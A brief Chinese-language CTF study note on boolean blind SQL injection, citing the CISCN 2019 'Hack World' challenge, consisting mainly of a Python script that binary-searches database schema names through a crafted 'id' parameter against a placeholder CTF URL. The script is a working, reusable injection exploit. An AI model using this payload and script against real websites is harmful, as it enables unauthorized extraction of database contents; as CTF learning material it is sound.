布尔盲注.md

参考[CISCN2019 华北赛区 Day2 Web1]Hack World（学习）

---

One possible wheel

import requests
import time
import sys

url = "http://xxx.node4.buuoj.cn:81/search.php"

fmt = '0^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)'
false_re = '<should a string that appears if and only if the result of fmt is false>'

for i in range(1, 200):
    l = 0
    r = 127
    while l < r:
        mid = (l + r) // 2
        payload = fmt % (i, mid)
        params = {'id': payload}
        response = requests.get(url, params)
        time.sleep(0.2)
        if response.text.find(false_re) >= 0: # mid >= ans
            r = mid
        else: # mid < ans
            l = mid + 1
    print(chr(l), end='')
    sys.stdout.flush()

#Web #SQL注入 #布尔盲注